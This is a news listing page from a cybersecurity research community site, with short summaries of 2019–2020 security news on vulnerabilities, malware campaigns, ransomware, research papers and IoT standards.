News Items

  • news

    Visible to the public NIST Releases Draft Security Feature Recommendations for IoT Devices

    NIST Releases Draft Security Feature Recommendations for IoT Devices

    "Core Baseline" guide offers practical advice for using everyday items that link to computer networks.

    August 01, 2019

  • news

    Visible to the public Game-theoretic Paper Wins Annual Paper Competition

    The winner of the 6th Annual Best Scientific Cybersecurity Paper Competition is How Shall We Play a Game? A Game-theoretical Model for Cyber-warfare Games by Tiffany Bao, Yan Shoshitaishvili, Ruoyu Wang, Christopher Kruegel, Giovanni Vigna, and David Brumley. These researchers are from Carnegie Mellon University and University of California, Santa Barbara. This paper was originally accepted at 30th IEEE Computer Security Foundations Symposium (CSF '17).

    To learn more visit the competition homepage: https://cps-vo.org/group/sos/papercompetition/pastcompetitions

  • news

    Visible to the public NSA SoS Lablet Call for Proposals is Open

    The National Security Agency has distributed its BAA (really a request for proposals) for its next generation of SoS Lablets. These lablets include lablets on the 5 Hard Problem areas in Science of Security, on the Science of Privacy and dealing with Cyber Physical Systems. Proposals are due August 21. While the SoS team is not the point of contact for the contracting process, we can aid in directing: https://cps-vo.org/group/SoS/contact

  • news

    Visible to the public "Security Researcher Finds Unencrypted Video on Bodycam From Fort Huachuca"

    A security researcher was able to extract audio and video from a used Axon body camera they purchased on eBay. The researcher extracted unencrypted data from the camera's microSD card using a forensics tool developed by the Air Force Office of Special Investigations, called Foremost. The video files within the unencrypted data show Huachuca military police performing activities such as searching a house and filling out paperwork. This article continues to discuss the discovery of unencrypted video on an Axon body camera from Fort Huachuca and other findings made by security researchers on the extraction of data from SD cards in used body cameras.

    GCN reports "Security Researcher Finds Unencrypted Video on Bodycam From Fort Huachuca"

  • news

    Visible to the public "Critical SAP Bug Allows Full Enterprise System Takeover"

    SAP has disclosed to its customers a critical vulnerability that has scored a severity score of 10 out of 10 on the CvSS bug-severity scale. SAP has a widely deployed collection of enterprise resource planning (ERP) software, which clients use to manage their financials, logistics, customer-facing organizations, human resources, and other business areas. The bug has been named RECON, and it affects more than 40,000 SAP customers. Successful exploitation of the bug would allow for attacks to read and modify financial records; change banking details; read personal identifiable information (PII); administer purchasing processes; sabotage or disrupt operations; achieve operating system command execution; and delete or modify traces, logs, and other files. SAP has delivered a patch for the issue on Tuesday as part of its July 2020 Security Note.

    Threatpost reports: "Critical SAP Bug Allows Full Enterprise System Takeover"

  • news

    Visible to the public "Filter Protects Against Deepfake Photos and Videos"

    Deepfakes are fake images, audio recordings, or videos developed using Machine Learning (ML). The continued advancement of deepfakes will decrease the effectiveness of security systems that apply facial recognition technologies for authentication. Therefore, researchers have created an algorithm that generates an adversarial attack against facial manipulation systems to prevent deepfake videos and photos. The algorithm allows users to apply a protective filter to their images or videos before uploading them to the internet. Researchers must continue the development of sophisticated methods for disrupting deepfakes. This article continues to discuss recent advances in deepfake technology, the new algorithm created to prevent deepfakes, and the importance of developing more techniques to combat deepfakes.

    NextGov reports "Filter Protects Against Deepfake Photos and Videos"

  • news

    Visible to the public "Backdoors Identified in C-Data Fiber Broadband Devices"

    Security researchers have identified backdoors in 29 C-Data Fiber-To-The-Home (FTTH) Optical Line Terminal (OLT) devices. According to the researchers, an attacker can extract administrator credentials via the command-line interface (CLI) if they have backdoor access to the OLT. Through the abuse of CLI access, an attacker can execute commands as root and exfiltrate information using the embedded web server. The vulnerabilities could also allow attackers to steal web and telnet credentials, as well as SNMP communities without authentication. This article continues to discuss the backdoors found in C-Data fiber broadband devices and what the exploitation of these backdoors could allow attackers to do.

    Security Week reports "Backdoors Identified in C-Data Fiber Broadband Devices"

  • news

    Visible to the public "TrickBot Malware Mistakenly Warns Victims That They Are Infected"

    The developers of the infamous modular banking trojan, called TrickBot, have made a mistake that results in alerts to victims. Once infected, victims will receive a warning that brings attention to the malware's presence on their device and the need to contact their administrator. TrickBot malware is commonly distributed via phishing campaigns. It can steal OpenSSH keys, passwords, cookies, a domain's Active Directory Services database, and more. This article continues to discuss the test module mistakenly left by TrickBot's creators that warns those infected by the malware, what victims should do when they see this warning, and the banking trojan's traditional capabilities.

    Bleeping Computer reports "TrickBot Malware Mistakenly Warns Victims That They Are Infected"

  • news

    Visible to the public "Popular Home Routers Plagued by Critical Security Flaws"

    In a new study, researchers tested more than 100 consumer-grade routers from seven large vendors. The researchers discovered that nearly all tested routers were affected by scores of unpatched and often severe security flaws, which could put users at risk of a cyberattack. Even the routers that had been recently updated still were affected by many vulnerabilities. The researchers found that the average length of time since the latest security update for a router was 378 days. Of the routers tested 46, did not receive any security update within the last year. On average, the routers were affected by 53 critical-related vulnerabilities.

    WeLiveSecurity reports: "Popular Home Routers Plagued by Critical Security Flaws"

  • news

    Visible to the public "Coordinating Disclosures of Medical Device Vulnerabilities"

    Healthcare organizations continue to face significant cybersecurity threats that could affect people's well-being and safety. Therefore, the medical device manufacturer, Becton, Dickinson and Company (BD), has enhanced its coordinated vulnerability disclosure process established to help in the identification, evaluation, and communication of problems to regulators and industry stakeholders. According to Dana-Megan Rossi, BD's director of information security threat and vulnerability management, the company works closely with security researchers to improve the protection of medical devices against cyberattacks. This article continues to discuss BD's collaboration with security researchers to address vulnerabilities in medical devices and other efforts to improve medical device cybersecurity.

    GovInfoSecurity reports "Coordinating Disclosures of Medical Device Vulnerabilities"

  • news

    Visible to the public "Avoiding Malware on the Move"

    In an article published in the International Journal of Internet Technology and Secured Transactions, researchers from India discussed the security measures implemented for mobile devices that use Google's Android operating system. The researchers suggest that Android and its applications ecosystem are more vulnerable to malware due to their more open nature, while the more closed and isolated operating system used by Apple devices are less vulnerable to malware. Evidence shows that more than 90% of malware targets Android than any other mobile operating system. This article continues to discuss Android's vulnerability to malware, the increase in infected Android apps, and the need for efficient anti-malware software that accurately detects mobile malware.

    TechXplore reports "Avoiding Malware on the Move"

  • news

    Visible to the public "USB Storage Devices: Convenient Security Nightmares"

    USB storage devices are very convenient however, from a business security perspective, their highly accessible and portable nature makes them a complete nightmare. According to new research, the researchers found that due to COVID-19, there has been a 123 percent increase in the volume of data downloaded to USB storage devices by employees. Because of the sharp rise in the use of USB storage devices, hundreds of terabytes of potentially sensitive, unencrypted corporate data are floating around at any given time, significantly increasing the risk of severe data loss. The researchers suggest that organizations implement USB control and encryption to minimize the risk of a data breach substantially.

    Help Net Security reports: "USB Storage Devices: Convenient Security Nightmares"

  • news

    Visible to the public "Securing the Smart Home"

    A team of researchers from India has presented a new intrusion detection system for smart homes, called "SmartGaurd." The system will detect malicious behavior in a smart home's network. SmartGaurd will also identify malicious communications coming from outside. The team says the system will use a cluster-based approach to detection. This article continues to discuss the proposed SmartGaurd intrusion detection system and the importance of securing smart homes against hackers.

    Homeland Security News Wire reports "Securing the Smart Home"

  • news

    Visible to the public "7 in 10 Organizations Suffer Public Cloud Security Breach"

    Findings from a survey report recently released by Sophos, titled "The State of Cloud Security 2020," suggested that 50% of multi-cloud organizations are more likely to suffer cloud security breaches than organizations using a single cloud environment. According to the report, most organizations that host data or workloads in the public cloud experienced ransomware attacks, account compromise, data theft, or cryptojacking last year. The report also highlights the rise in accidental database exposure due to misconfigurations. This article continues to discuss the increase in cloud security incidents and risks.

    CISO MAG reports "7 in 10 Organizations Suffer Public Cloud Security Breach"

  • news

    Visible to the public "Zero-Day Flaw Found in Zoom For Windows 7"

    Researchers at ACROS Security have discovered a previously unknown flaw in the videoconferencing software Zoom. An adversary who successfully exploits the vulnerability could access files on the vulnerable computer, and if the user is a local administrator, the attacker could completely take over the computer. The zero-day vulnerability applies to Zoom software running on Windows 7, or even older operating systems.

    Cyberscoop reports: "Zero-Day Flaw Found in Zoom For Windows 7"

  • news

    Visible to the public "Honeywell Cybersecurity Research Reveals The Risk Of USB Threats To Industrials Has Doubled Over 12 Months"

    A new study conducted by the technology firm Honeywell emphasizes the dangers posed by USB devices to the security of operational technology (OT) systems. The study examined cybersecurity threat data collected from industrial facilities worldwide via Honeywell's Secure Media Exchange (SMX) technology. Findings from the latest Honeywell Industrial USB Threat Report show that the total number of threats posed by USB removable media to industrial process control networks is still high. The number of threats targeting OT systems increased from 16% to 28% over a period of 12 months. The study also pointed out that 1 in 5 threats was designed to leverage USB removable media as an attack vector. This article continues to discuss key findings pertaining to the risk of USB threats to industrial systems.

    PR Newswire reports "Honeywell Cybersecurity Research Reveals The Risk Of USB Threats To Industrials Has Doubled Over 12 Months"

  • news

    Visible to the public "Google Fixes Smartwatch Security Problem Discovered by Purdue Researchers"

    Google released a patch to fix a vulnerability that researchers at Purdue University found in its Wear OS smartwatches. The exploitation of the vulnerability could have allowed attackers to crash specific apps, cause the watch to become unresponsive, or make the watch continuously reboot. The researchers used a tool they developed, called Vulcan, to discover the vulnerability. Vulcan applies the software testing technique, fuzzing, in which a program is fed with invalid or random data until it reveals a flaw. The Vulcan tool helped researchers identify the vulnerability in the latest version of the Wear OS and 13 highly-downloaded smartwatch apps available on Google Play, including Google Fit, Nike Run Club, and Google Maps. This article continues to discuss the critical vulnerability found in Google's Wear OS smartwatches, the tool used to make this discovery, and the growing insecurity of wearable devices.

    Purdue Today reports "Google Fixes Smartwatch Security Problem Discovered by Purdue Researchers"

  • news

    Visible to the public "Billions of Passwords Now Available on Underground Forums, Say Security Researchers"

    An 18-month analysis conducted by cybersecurity researchers at Digital Shadows on cybercriminals' access to and use of stolen account details revealed that usernames and passwords for more than 15 billion accounts are being distributed on the dark web. The stolen credentials circulating on underground forums allow cybercriminals to access network administrator accounts, bank accounts, virtual private networks (VPNs), streaming services, and more. Researchers warn that many account credentials are getting leaked online because of the use of weak passwords, which can easily be cracked through the performance of brute force attacks. Users are encouraged to create a unique password and apply multi-factor authentication (MFA) for each of their online accounts. This article continues to discuss the proliferation of stolen account credentials on the dark web, the value of these credentials to attackers, and how people can strengthen their online accounts' security.

    ZDNet reports "Billions of Passwords Now Available on Underground Forums, Say Security Researchers"

  • news

    Visible to the public "Automotive Cyber Incidents Doubled in 2019, Reaching 188 Vulnerabilities"

    Connected vehicles introduce significant risks to safety. As vehicles increase in connectivity, they become more vulnerable to being hacked, manipulated, and disabled by cybercriminals. The existence of vulnerabilities in connected cars creates more opportunities for cybercrime. Atlas VPN found that the number of automotive hacking incidents in 2019 doubled compared to the data of 2018. Data shows that from 2016 to 2019, the number of cyber incidents increased more than seven times. The number of cyber incidents in 2018 increased by almost 138%. This article continues to discuss the increase in automotive cyber incidents last year and the most common attack vectors for connected vehicles.

    CXOtoday reports "Automotive Cyber Incidents Doubled in 2019, Reaching 188 Vulnerabilities"

  • news

    Visible to the public "Magecart-Related Group Hits 570 Websites, Taking 184,000 Card Numbers"

    A hacking group known as "Keeper" has targeted 570 e-commerce sites to steal customer financial information using Magecart attacks. The hacking group has been around since 2017 and has been able to compromise more than 180,000 payment cards as part of a covert fraud effort. The adversaries inserted malicious computer code onto the sites, usually by exploiting weaknesses in technology provided by the sites' third-party software suppliers. Magecart attacks have become a daily occurrence for small to medium-sized e-commerce businesses around the world.

    Cyberscoop reports: "Magecart-Related Group Hits 570 Websites, Taking 184,000 Card Numbers"

  • news

    Visible to the public "Mounting IIoT Cyber Risks Must Be Addressed Now to Prevent Catastrophe"

    The speed and sophistication of cyberattacks on the Industrial Internet of Things (IIoT) continue to grow. A report from Lloyd's Register Foundation, the U.K.-based global safety charity, suggests preventative security measures to address the increasing IIoT risks to energy, transport, manufacturing, and other critical infrastructure sectors. The report identifies key emerging risks and existing capability gaps that emphasize the insufficiency of the current pace of change in operational cybersecurity. Organizations are encouraged to address capability gaps by investing in forensic readiness processes, considering how security controls may fail as IoT devices increase, investing in training for staff on IoT standards, and more. This article continues to discuss the report's goal and its suggested actions for addressing rising IIoT cyber risks.

    SC Media reports "Mounting IIoT Cyber Risks Must Be Addressed Now to Prevent Catastrophe"

  • news

    Visible to the public "Microsoft Seizes Domains Used in COVID-19-Themed Attacks"

    The US District Court for the Eastern District of Virginia granted Microsoft permission to seize control of malicious domains used in COVID-19-themed attacks, such as those executed against Office 365 accounts, that have become common over the past several months. According to the company, COVID-19-themed Business Email Compromise attacks (BEC), involving millions of phishing emails, have been observed targeting Microsoft business users in over five dozen countries. The massive scale and persistence of these attacks prompted Microsoft to seek legal action. Threat actors are increasingly exploiting the fear and concern surrounding the coronavirus outbreak to improve the success of email and social engineering lures. Attackers have registered thousands of COVID-19-themed domains in the past several months to trick unsuspecting Internet users into giving up their personal data, credentials, or sensitive other information. This article continues to discuss the rise in coronavirus-related attacks and Microsoft's complaint filed against COVID-19-themed (BEC) attacks.

    Dark Reading reports "Microsoft Seizes Domains Used in COVID-19-Themed Attacks"

  • news

    Visible to the public "Cerberus Banking Trojan Unleashed on Google Play"

    Researchers first spotted Cerberus malware last August, and it was being offered in a malware-as-a-service (MaaS) model. Since then, a newly discovered variant of the Cerberus Android trojan has been spotted. The malware has become much more sophisticated and has more info-harvesting capabilities. Researchers found a malicious Android app on the Google Play app marketplace that distributes the banking trojan, Cerberus. The application is called "Calculadora de Mondea" and is a Spanish currency converter app. The Cerberus malware can steal a user's banking credentials, bypass security measures, including two-factor authentication and access text messages. The application has been downloaded 10,000 times so far. Cerberus malware disguises itself as an genuine app to access the banking details of unsuspecting users.

    Threatpost reports: "Cerberus Banking Trojan Unleashed on Google Play"

  • news

    Visible to the public "Cyber Command Backs 'Urgent' Patch for F5 Security Vulnerability"

    F5 Networks, one of the leading global providers of enterprise networking equipment, recently patched a critical vulnerability found in its BIG-IP family of application delivery controllers. The remote code execution vulnerability impacts the BIG-IP products' Traffic Management User Interface (TMUI). The US Department of Defense's Cyber Command and the Cybersecurity and Infrastructure Security Agency (CISA) encourage organizations to apply the patch for the vulnerability as its exploitation could lead to complete system compromise. The flaw received a Common Vulnerability Scoring System (CVSS) score of 10, emphasizing its high level of severity. This article continues to discuss the severity and exploitation of the critical BIG-IP flaw.

    CyberScoop reports "Cyber Command Backs 'Urgent' Patch for F5 Security Vulnerability"

  • news

    Visible to the public "Android Users Hit with ‘Undeletable’ Adware"

    Researchers at Kaspersky have discovered that 14.8 percent of Android users who were targeted with mobile malware or adware last year, was left with undeletable files. Most of the users affected by mobile adware or mobile malware suffered a system partition infection, which made the malicious files undeletable. The undeletable files were mostly trojans that can install and run apps without the user's knowledge. The researchers found that the most common types of malware used to target users were two older threats: The Lezok and Triada trojans.

    Threatpost reports: "Android Users Hit with 'Undeletable' Adware"

  • news

    Visible to the public "Researchers Use AI to Highlight Zoom's Privacy Risks"

    According to researchers at Ben-Gurion University of the Negev (BGU), it is relatively easy to extract personal information such as face images, names, ages, and more from public screenshots of video meetings held on Zoom and other video conferencing platforms. Data collected from video conference meetings can be cross-referenced with social network data using image processing, text recognition, and forensics. Linkage attacks pose a threat to individuals' privacy as well as the privacy and security of organizations. This article continues to discuss the increased use of video conferencing platforms during the COVID-19 pandemic, the application of Artificial Intelligence (AI) to perform linkage attacks on users, and recommendations for mitigating privacy risks associated with such platforms.

    VB reports "Researchers Use AI to Highlight Zoom's Privacy Risks"

  • news

    Visible to the public "Thousands of MongoDB Databases Ransacked, Held For Ransom"

    Attacks that involve infiltrating and holding cloud databases for ransom have been around since at least 2016. Security researchers at GDI Foundation have discovered that an unknown cybercriminal has infiltrated 22,900 unsecured MongoDB databases. The adversary then wipes their contents and then leaves behind a ransom note demanding bitcoin in return for the data. The adversary warns that if the ransom is not paid within two days, they will notify authorities in charge of enforcing the European Union's General Data Protection Regulation (GDPR). The adversary asks for 0.015 bitcoins (about $140) to return the data.

    WeLiveSecurity reports: "Thousands of MongoDB Databases Ransacked, Held For Ransom"

  • news

    Visible to the public "New Research Reveals Privacy Risks Of Home Security Cameras"

    Researchers from the Queen Mary University of London and the Chinese Academy of Science did a study that reveals the risks posed to privacy by home security cameras. The study was performed using data from a major home International Protocol (IP) security camera provider. The study's findings showed that attackers could monitor and analyze the traffic generated by IP home security cameras to predict when a house is occupied or not. Past traffic generated by these cameras could also be used by attackers to predict future activity, leaving camera owners' homes more vulnerable to burglary. This article continues to discuss key findings from the study on the inference of privacy-compromising information about an IP home security camera's owner without inspecting video content itself.

    SCIENMAG reports "New Research Reveals Privacy Risks Of Home Security Cameras"

  • news

    Visible to the public "Vulnerable Drivers Can Enable Crippling Attacks Against ATMs and POS Systems"

    Researchers from the security firm, Eclypsium, have discovered vulnerabilities and design flaws in 40 Windows drivers from at least 20 different hardware vendors. Servers, workstations, and laptops are not the only types of devices that run the Windows operating system. Windows is also used on automated teller machines (ATMs), point of sale (POS) terminals, self-service kiosks, and medical devices, which are generally harder to update. According to Eclypsium researchers, the exploitation of vulnerable drivers can enable various attacks against ATMs and POS systems. These attacks can lead to privilege escalation, unauthorized access to sensitive information, and the theft of money or customer data. This article continues to discuss potential attacks against ATM and POS devices through the abuse of vulnerable drivers and the importance of implementing security in the design of device drivers.

    CSO Online reports "Vulnerable Drivers Can Enable Crippling Attacks Against ATMs and POS Systems"

  • news

    Visible to the public "Government Ransomware Gangs Are Doing Their Homework Before Encrypting Corporate Data"

    According to Matt Travis, deputy director of the U.S. Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA), ransomware gangs are doing much more than just infiltrating networks and stealing data. The criminal hackers are also secretively looking around networks to find financial data, such as balance sheets, to gain intelligence on how much of a ransom they can demand from a targeted business. The longer cybercriminals go undetected on a network, the more power they gain. Therefore, companies must take steps to reduce hackers' dwell time. This article continues to discuss criminal hackers' performance of reconnaissance activities before ransomware delivery, recent attacks by known ransomware gangs, and a common misconception with ransomware.

    CyberScoop reports "Government Ransomware Gangs Are Doing Their Homework Before Encrypting Corporate Data"

  • news

    Visible to the public "Apache Guacamole Opens Door for Total Control of Remote Footprint"

    Apache Guacamole is a popular infrastructure for enabling remote working. Researchers have recently discovered that it is vulnerable to many security bugs related to the Remote Desktop Protocol (RDP). If an adversary gains control of the gateway, they can eavesdrop on all incoming sessions, record all the credentials used, and start new sessions to control the rest of the computers within the organization. The researchers suggest that admins update their systems to avoid attacks aimed at stealing information or remote code-execution.

    Threatpost reports: "Apache Guacamole Opens Door for Total Control of Remote Footprint"

  • news

    Visible to the public "Schools Already Struggled with Cybersecurity. Then Came COVID-19"

    The COVID-19 pandemic has amplified the cybersecurity challenges faced by school districts across the United States. Before the coronavirus crisis, school districts had already been experiencing cybersecurity shortcomings because of the lack of dedicated funding and the shortage of skilled security professionals to assess and enhance cybersecurity defenses. These insufficiencies have resulted in system setup errors and poor patch management that leave schools and their students vulnerable to hackers and scams. The shift to online learning has intensified these risks. Millions of teachers and students must now use chat software, lesson portals, digital message boards, and other online tools, which could be used as attack vectors if they are not set up with proper authentication and controls. Attackers can also abuse the tools used for accessing school networks remotely, including virtual private networks (VPNs) and the Remote Desktop Protocol (RDP), to infiltrate systems. This article continues to discuss the cybersecurity challenges facing school districts, the amplification of these challenges by the pandemic, vulnerabilities discovered in different school systems, and current K-12 digital security incident-reporting.

    Wired reports "Schools Already Struggled with Cybersecurity. Then Came COVID-19"

  • news

    Visible to the public "Ransomware Operators Claim They Hacked Printing Giant Xerox"

    Maze ransomware operators claim to have stolen files from the systems of the U.S. printing giant Xerox. The cybercriminals are threatening to leak the stolen information to the public if Xerox does not pay the demanded ransom. Other companies that have fallen victim to Maze ransomware attacks include Cognizant, Conduent, MaxLinear, and LG. The possibility of competitors or other criminal groups having access to leaked data further pressures victims into meeting the demands for ransom payments. This article continues to discuss Maze ransomware operators' alleged targeting of Xerox and other major companies that have been targeted by the operators.

    Security Week reports "Ransomware Operators Claim They Hacked Printing Giant Xerox"

  • news

    Visible to the public "Ripple20 Threatens Increasingly Connected Medical Devices"

    JSOF security researchers recently discovered a series of vulnerabilities, dubbed "Ripple20", that impact connected devices in the enterprise, industrial, and healthcare industries. The Ripple20 vulnerabilities were found in a low-level TCP/IP software library, which many IoT device manufacturers build directly into their devices or integrate via embedded third-party components. These flaws could enable denial-of-service (DoS) attacks, information disclosure, remote code execution, and other malicious activities. Infusion pumps were among the devices confirmed to be vulnerable. The exploitation of Ripple20 vulnerabilities in infusion pumps, poses a significant threat to safety as these devices deliver doses of medicine directly to patients. This article continues to discuss the potential impact of Ripple20, the growing concern about the security of connected medical devices, and what hospitals can do to protect their medical devices.

    Dark Reading reports "Ripple20 Threatens Increasingly Connected Medical Devices"

  • news

    Visible to the public "FakeSpy Android Malware Spread Via ‘Postal-Service’ Apps"

    Researchers have discovered a new "smishing" campaign carried out by the Roaming Mantis threat group. The adversaries are targeting Android mobile devices and are spreading FakeSpy infostealer malware. The malware is disguised as legitimate global postal-service apps. The researchers found that the postal apps used to disguise FakeSpy are country-specific, including USPS, Chungwha Post, the British Royal Mail, the German Deutsche Post, France's La Poste, Japan Post, and Swiss Post. When the malware is activated, it steals the victim's SMS messages, financial data, and more.

    Threatpost reports: "FakeSpy Android Malware Spread Via 'Postal-Service' Apps"

  • news

    Visible to the public "Philips Release Patches for Vulnerabilities Affecting its Medical Devices"

    Philips, a leading health technology solutions company, recently reported vulnerabilities discovered in its ultrasound medical devices to the U.S. Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA). According to an official statement from CISA, the vulnerabilities were found in Ultrasound ClearVue, Ultrasound CX, Ultrasound EPIQ/Affiniti, Ultrasound Sparq, and Ultrasound Xperius devices. Attackers can view or alter information by exploiting the security flaws discovered in these devices. CISA recommends that healthcare organizations implement physical security measures, apply defense-in-depth strategies, disable unnecessary accounts, and more, to prevent the abuse of the vulnerabilities. This article continues to discuss the security flaws identified in ultrasound medical devices and Philips' response to the flaws, as well as preventative measures recommended by CISA and other research that highlight the vulnerability of medical devices to cyberattacks.

    CISO MAG reports "Philips Release Patches for Vulnerabilities Affecting its Medical Devices"

  • news

    Visible to the public "Resilience Improved, but Response Dragged Down by Too Many Tools, Too Few Playbooks"

    IBM Security's fifth annual Cyber Resilient Organization Report based on a global survey conducted by the Ponemon Institute found that most organizations' response plans are still inadequate. More than 70 percent of organizations have revealed that their security plans are applied inconsistently, non-existent, or are ad-hoc. According to the report, the large number of different security solutions and technologies used by security teams has weakened security response. Security experts call on organizations to establish a formal incident response plan and update their cybersecurity posture. This article continues to discuss key findings from IBM Security's latest global report on organizations' security response plans.

    SC Media reports "Resilience Improved, but Response Dragged Down by Too Many Tools, Too Few Playbooks"

  • news

    Visible to the public "Email Sender Identity is Key to Solving the Phishing Crisis"

    There have been massive advancements in perimeter and endpoint defenses, but email remains a cybersecurity risk for many companies. Almost 90 percent of email attacks manipulate sender identity to fool recipients and initiate social engineering attacks. Phishing attacks are increasingly mutating quickly and continuously shift tactics and lures. Adversaries have learned how to get through email security at all three defensive layers currently in use by most organizations: the gateway, the mail client, and the end-user. For organizations to protect themselves from email attacks, companies need to start validating sender identities. For this to be effective, sender identity solutions will need to address all three types of identity-based attacks: open-signup attacks, untrusted-domain attacks, and domain-spoofing attacks.

    Threatpost reports: "Email Sender Identity is Key to Solving the Phishing Crisis"

  • news

    Visible to the public "New EvilQuest macOS Ransomware is a Smokescreen For Other Threats"

    A new macOS ransomware dubbed EvilQuest was first spotted in late June by a malware researcher with K7 Lab. The ransomware was impersonating the Google Software Update program. The ransomware is usually delivered bundled up with pirated versions of popular macOS software. The ransomware is used as a smokescreen by adversaries and its "noisiness", is used to hide other things happening on the system in the background like the installation of a keylogger and a reverse shell, and the exfiltration of files that contain valuable information.

    Help Net Security reports: "New EvilQuest macOS Ransomware is a Smokescreen For Other Threats"

  • news

    Visible to the public "No Keys to the Kingdom: New Single Sign-On Algorithm Provides Superior Privacy"

    Researchers from the Tokyo University of Science (TUS) have developed a new single sign-on (SSO) algorithm that prevents the disclosure of a user's identity and personal information to third parties. SSO systems provide users the option to access different services and applications, using a single set of credentials (username and password). For example, one may log onto a website using their Facebook or Gmail login credentials. However, SSO systems are third party systems often managed by Big Tech companies who have been reported to collect personal information without users' permission for purposes such as targeted advertising. This article discusses the advantages of SSO systems, the concerns surrounding these systems, and TUS researchers' proposed cryptographic scheme to hide sensitive information from third parties when accessing services via SSO systems.

    The Tokyo University of Science reports "No Keys to the Kingdom: New Single Sign-On Algorithm Provides Superior Privacy"

  • news

    Visible to the public "iOS 14 Flags TikTok, 53 Other Apps Spying on iPhone Clipboards"

    iOS 14 beta version has been released. iOS 14 can identify applications that silently and automatically read anything a user copies into their mobile device's clipboard. The iOS 14 flagged TikTok, and 53 other apps for spying on iPhone clipboards. The information copied to a user's clipboards could be information a user does not want anyone to know, such as passwords copied from a password manager, bank account information, and Bitcoin addresses. The covert content copying is possible not only for a device's local data but also on nearby devices, as long as the devices share the same Apple ID and are within about 10 feet.

    Naked Security reports: "iOS 14 Flags TikTok, 53 Other Apps Spying on iPhone Clipboards"

  • news

    Visible to the public "Hackers Hide Credit Card Stealing Script in Favicon Metadata"

    Malwarebytes recently reported malicious code insertion inside the Exchangeable Image File Format (EXIF) data of a favicon by hackers. A favicon is a small image used by web browsers to show a graphical representation of a website. Hackers are hiding scripts in favicon images' EXIF data to evade detection and steal credit card information. This attack is considered a variant of a Magecart attack. Such attacks have been performed against Macy's, British Airways, Tupperware, and other widely popular companies. According to Malwarebytes, credit cards stolen through the execution of Magecart attacks are being sold or used to make fraudulent purchases on the dark web market. This article continues to discuss the use of favicon metadata to hide credit card-stealing scripts and other techniques applied by Magecart hackers to circumvent detection.

    Bleeping Computer reports "Hackers Hide Credit Card Stealing Script in Favicon Metadata"

  • news

    Visible to the public "New Cybersecurity Standard for IoT Devices Established By ETSI"

    The European Telecommunications Standards Institute (ETSI) Technical Committee on Cybersecurity has revealed a new standard, titled ETSI EN 303 645, for the Internet of Things (IoT). It was developed through collaboration with members from academia, industry, and government to bolster the security of IoT devices such as children's toys, baby monitors, smart cameras, wearable health trackers, smart home assistants, and more. The goal is to restrict cybercriminals' ability to take over devices, execute distributed denial-of-service (DDoS) attacks, mine cryptocurrency, and spy on users. This article continues to discuss the aim and development of the new cybersecurity standard for IoT devices.

    Infosecurity Magazine reports "New Cybersecurity Standard for IoT Devices Established By ETSI"

  • news

    Visible to the public "US Cyber Command Says Foreign Hackers Will Most Likely Exploit New PAN-OS Security Bug"

    US Cyber Command is warning that foreign state-sponsored hacking groups will likely try to exploit a significant security bug disclosed today in PAN-OS. PAN-OS is the operating system running on firewalls and enterprise VPN appliances from Palo Alto Networks. The vulnerability is an authentication bypass that allows adversaries to access a device without valid credentials. Once exploited, the bug allows hackers to change PAN-OS settings and features. The bug could be used to disable firewalls or VPN access-control policies, effectively disabling the entire PAN-OS devices. The vulnerability was given a 10/10 CVSSv3 score meaning the vulnerability is both easy to exploit as it doesn't require advanced technical skills, and it's remotely exploitable via the internet, without requiring attackers to gain an initial foothold on the attacked device.

    ZDNet reports: "US Cyber Command Says Foreign Hackers Will Most Likely Exploit New PAN-OS Security Bug"

  • news

    Visible to the public SoS Musings #38 - Critical Infrastructure Cybersecurity

    SoS Musings #38 -

    Critical Infrastructure Cybersecurity

  • news

    Visible to the public  "New Vulnerabilities in Open Source Packages Down 20% Compared to Last Year"

    Researchers at Snyk have discovered that new vulnerabilities in open source packages are down 20 percent compared to last year, suggesting that the security of open source containers and packages are heading in a positive direction. Cross-site scripting vulnerabilities were the most commonly found by the researchers. They also found that SQL Injection vulnerabilities are decreasing prevalence in most ecosystems, but have increased over the last three years in PHP packages.

    Help Net Security reports: "New Vulnerabilities in Open Source Packages Down 20% Compared to Last Year"

  • news

    Visible to the public Cyber Scene #45 - Cyber Offense and Defense: The U.S. Election 3D Chessboard

    Cyber Scene #45 -

    Cyber Offense and Defense: The U.S. Election 3D Chessboard

  • news

    Visible to the public Cybersecurity Snapshots #7 - Is Online Voting a Good Idea?

    Cybersecurity Snapshots #7 -

    Is Online Voting a Good Idea?

  • news

    Visible to the public Spotlight on Lablet Research #7 - Foundations of Cyber-Physical Systems Resilience

    Spotlight on Lablet Research #7 -

    Project: Foundations of Cyber-Physical Systems Resilience